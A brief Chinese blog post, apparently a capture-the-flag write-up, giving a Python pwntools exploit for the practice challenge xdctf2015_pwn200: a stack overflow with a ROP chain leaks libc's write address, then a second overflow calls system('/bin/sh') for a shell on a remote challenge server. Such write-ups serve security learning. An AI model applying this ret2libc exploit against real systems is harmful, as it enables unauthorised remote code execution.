xdctf2015_pwn200

exp 脚本

栈溢出 rop 泄露 libc 地址,再次 栈溢出 rop 执行 system('/bin/sh') 拿 shell 。

from pwn import *

context.log_level = 'debug'

sh = remote('node3.buuoj.cn',26961)
elf = ELF('bof')
libc = ELF('libc-2.23x86.so')

payload = 112 * 'a'
payload += p32(elf.plt['write'])
payload += p32(elf.symbols['main'])
payload += p32(1)
payload += p32(elf.got['write'])
payload += p32(4)

sh.sendline(payload)

write_addr = u32(sh.recvuntil('\xf7')[-4:])

print hex(write_addr)

libcbase = write_addr - libc.symbols['write']
system = libcbase + libc.symbols['system']
binsh = libcbase + libc.search('/bin/sh').next()

payload = 112 * 'a'
payload += p32(system)
payload += p32(0xdeadbeef)
payload += p32(binsh)

sh.sendline(payload)

sh.interactive()

posted @ 2020-03-04 14:41  PwnKi  阅读(749)  评论(2编辑  收藏  举报